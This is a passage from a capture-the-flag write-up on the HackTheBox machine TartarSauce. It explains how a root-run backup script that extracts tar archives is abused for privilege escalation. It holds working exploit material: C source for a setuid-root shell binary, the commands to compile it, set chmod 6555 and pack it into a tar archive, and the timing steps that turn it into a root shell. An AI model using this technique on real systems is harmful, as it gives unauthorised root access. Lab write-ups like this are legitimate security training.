# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

The script is not run by cron job. It run on system timer every 5 minutes.

systemctl list-timers
WARNING: terminal is not fully functional
-  (press RETURN)
NEXT                         LEFT          LAST                         PASSED  
Tue 2022-03-29 08:00:41 EDT  1min 29s left Tue 2022-03-29 07:55:41 EDT  3min 30s
Tue 2022-03-29 20:23:27 EDT  12h left      Mon 2022-03-28 20:23:27 EDT  11h ago 
Tue 2022-03-29 22:11:52 EDT  14h left      Tue 2022-03-29 06:24:25 EDT  1h 34min
Wed 2022-03-30 06:45:48 EDT  22h left      Tue 2022-03-29 06:30:28 EDT  1h 28min

The script is difficult to understand. Letsunderstand stepby step

basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

Step 1: Delet some foldertemp folder and check folder

/bin/rm -rf tmpdir/.* check

/bin/rm -rf /var/tmp/.* check

Step2:Create tar file of base folder( /var/www/html)

/usr/bin/sudo -u onuma /bin/tar -zcvf tmpfile basedir &

/usr/bin/sudo -u onuma /bin/tar -zcvf /var/tmp/.filename /var/www/html &

Step 3:Add delay

Add Delay /bin/sleep 30

Step 4: integrety check of backup once extraxted usinf tar -zxvf. The tar file will be extracted to tempfolder (/var/tmp/) with some different name. Then it moved to a new folder “check” under the temp folder and compare the difference with actual folder.

integrity_chk() { /usr/bin/diff -r basedir check$basedir }

/bin/mkdir check /bin/tar -zxvf tmpfile -C $check

integrity_chk() { /usr/bin/diff -r /var/www/html check /var/www/html }

/bin/mkdir check /bin/tar -zxvf tmpfile -C /var/tmp/check

To undersatnd better i ran pspy script again in different session to see how script works.

2022/03/28 20:04:48 CMD: UID=0    PID=30172  | /usr/bin/printf - 
2022/03/28 20:04:48 CMD: UID=0    PID=30146  | /bin/bash /usr/sbin/backuperer 
2022/03/28 20:04:48 CMD: UID=0    PID=30131  | /bin/bash /usr/sbin/backuperer 
2022/03/28 20:04:48 CMD: UID=0    PID=30227  | /bin/sleep 30 
2022/03/28 20:04:48 CMD: UID=0    PID=30226  | /usr/bin/sudo -u onuma /bin/tar -zcvf /var/tmp/.dbd2d8bf96339d3e8b21aa3a7eba9f4228416e46 /var/www/html 
2022/03/28 20:04:48 CMD: UID=1000 PID=30231  | gzip 
2022/03/28 20:04:48 CMD: UID=1000 PID=30230  | /bin/tar -zcvf /var/tmp/.dbd2d8bf96339d3e8b21aa3a7eba9f4228416e46 /var/www/html 
2022/03/28 20:05:18 CMD: UID=0    PID=30237  | gzip -d 
2022/03/28 20:05:18 CMD: UID=0    PID=30236  | /bin/tar -zxvf /var/tmp/.dbd2d8bf96339d3e8b21aa3a7eba9f4228416e46 -C /var/tmp/check 
2022/03/28 20:05:19 CMD: UID=0    PID=30239  | /usr/bin/diff -r /var/www/html /var/tmp/check/var/www/html 
2022/03/28 20:05:19 CMD: UID=0    PID=30238  | /bin/bash /usr/sbin/backuperer 
2022/03/28 20:05:20 CMD: UID=0    PID=30242  | 

As soon as you see the below below process, it creates a check folder under /var/tmp

22/03/28 20:55:13 CMD: UID=1000 PID=31592  | /bin/tar -zcvf /var/tmp/.decccf21841a356aaf2f7ecc8df83607ad746805 /var/www/html 
2022/03/28 20:55:43 CMD: UID=0    PID=31605  | gzip -d 
2022/03/28 20:55:43 CMD: UID=0    PID=31604  | /bin/tar -zxvf /var/tmp/.decccf21841a356aaf2f7ecc8df83607ad746805 -C /var/tmp/check 

However we have only 30 sec before it get deleted

2022/03/28 20:55:43 CMD: UID=0    PID=31604  | /bin/tar -zxvf /var/tmp/.decccf21841a356aaf2f7ecc8df83607ad746805 -C /var/tmp/check 
2022/03/28 20:55:45 CMD: UID=0    PID=31608  | /usr/bin/diff -r /var/www/html /var/tmp/check/var/www/html 
2022/03/28 20:55:45 CMD: UID=0    PID=31607  | /bin/bash /usr/sbin/backuperer 
2022/03/28 20:55:45 CMD: UID=0    PID=31610  | /bin/rm -rf /var/tmp/check . .. 

2022/03/29 03:03:16 CMD: UID=1000 PID=9087   | /bin/tar -zcvf /var/tmp/.8209fd97375aeaaa3d57ace7881a250e6ec84b82 /var/www/html 
2022/03/29 03:03:16 CMD: UID=0    PID=9084   | /bin/sleep 30 
2022/03/29 03:03:16 CMD: UID=0    PID=9083   | /usr/bin/sudo -u onuma /bin/tar -zcvf /var/tmp/.8209fd97375aeaaa3d57ace7881a250e6ec84b82 /var/www/html 
2022/03/29 03:03:46 CMD: UID=0    PID=9094   | gzip -d 
2022/03/29 03:03:46 CMD: UID=0    PID=9093   | /bin/tar -zxvf /var/tmp/.8209fd97375aeaaa3d57ace7881a250e6ec84b82 -C /var/tmp/check 
2022/03/29 03:03:47 CMD: UID=0    PID=9096   | /usr/bin/diff -r /var/www/html /var/tmp/check/var/www/html 
2022/03/29 03:03:47 CMD: UID=0    PID=9095   | /bin/bash /usr/sbin/backuperer 
2022/03/29 03:03:47 CMD: UID=0    PID=9098   | /bin/rm -rf /var/tmp/check . .. 

I could see the check folder with ls command however could not see inside of it. You should be fast.

onuma@TartarSauce:/var/tmp$
ls
ls
systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
systemd-private-4e3fb5c5d5a044118936f5728368dfc7-systemd-timesyncd.service-SksmwR
systemd-private-e11430f63fc04ed6bd67ec90687cb00e-systemd-timesyncd.service-PYhxgX
ls
ls
check
systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
cd check
cd check
bash: cd: check: No such file or directory
ls -al
ls -al
total 40
drwxrwxrwt 10 root root 4096 Mar 28 20:55 .
drwxr-xr-x 14 root root 4096 Feb  9  2018 ..
drwx------  3 root root 4096 Feb 17  2018 systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
drwx------  3 root root 4096 May 29  2020 systemd-private-4e3fb5c5d5a044118936f5728368dfc7-systemd-timesyncd.service-SksmwR
drwx------  3 root root 4096 Feb 17  2018 systemd-private-7bbf46014a364159a9c6b4b5d58af33b-systemd-timesyncd.se

The plan is to insert our code under/var/tmp/. Then once the program excecutes . there wll be a ““check”” folder created. We should excecute our payload with 30 sec of time once the check folder is created.

I have used [a simple c program](Rchitect/rchitect.c at Yoda · tcprks/Rchitect · GitHub) to create bash shell and compile it in kali machine

cat rchitect.c       
#include <stdio.h>
#include <unistd.h>

int main (void) {
    setuid(0);setgid(0);system("/bin/sh");
}                                                                                                                                                                            
┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ gcc -m32 -o rchitectbash rchitect.c                              
In file included from rchitect.c:1:
/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: No such file or directory
   27 | #include <bits/libc-header-start.h>
      |          ^~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.

The erros seems related to 32 bit binaries are not found.I ran these commands and fixed the issue

sudo apt-get install gcc-multilib g\+\+-multilib

Compile the program and create a tar file like below

 sudo gcc -m32 rchitect.c -o rchitectbash   


┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ ls -al rchitectbash                                                                                                                                                 2 ⨯
-rwxr-xr-x 1 root root 15188 Mar 28 21:31 rchitectbash

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ mkdir -p var/www/html

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ mv rchitectbash var/www/html/   

                                                                                                                           1 ⨯

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ sudo chown root.root -R var           

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ sudo chmod 6555 var/www/html/rchitectbash 

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ 

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ ls -al var/www/html 
total 24
drwxr-xr-x 2 root root  4096 Mar 28 21:34 .
drwxr-xr-x 3 root root  4096 Mar 28 21:33 ..
-r-sr-sr-x 1 root root 15188 Mar 28 21:31 rchitectbash

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ tar -zcvf rchitectbash.tar.gz var/    
var/
var/www/
var/www/html/
var/www/html/rchitectbash

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Can see the check folder created.

ls -al
total 11292
drwxrwxrwt 11 root  root      4096 Mar 29 04:49 .
drwxr-xr-x 14 root  root      4096 Feb  9  2018 ..
-rw-r--r--  1 onuma onuma 11511673 Mar 29 04:49 .8bfa94a64fe2448a8c8ce50f4ca293fec389e03d
drwxr-xr-x  3 root  root      4096 Mar 29 04:49 check
-rw-r--r--  1 onuma onuma     2690 Mar 28 22:51 rchitectbash.tar.gz

immidiatly chnage to check folder and run the payload script( ./rchitectbash) we have the root shell.

Lessons learnt: Link to heading

Take a note of rabithole in the servers. In this case Monstra exploit was a rabit hole as we could not upload the php reverse shell.

In the Directory scan, if you identify a sub directory , always run one more scan to identify the folders and files inside the newly found directories. In this case, we should have never identified wordpress site without second directory scan.

Privilege escalation was great learing in this box. We have to learn the properties of tar, diff programs which helps in this case of privilege escaltion.

In you are no programming experts, try to search for simple c program for creating a bash shell.I have uploaded one in my github which i found from google search.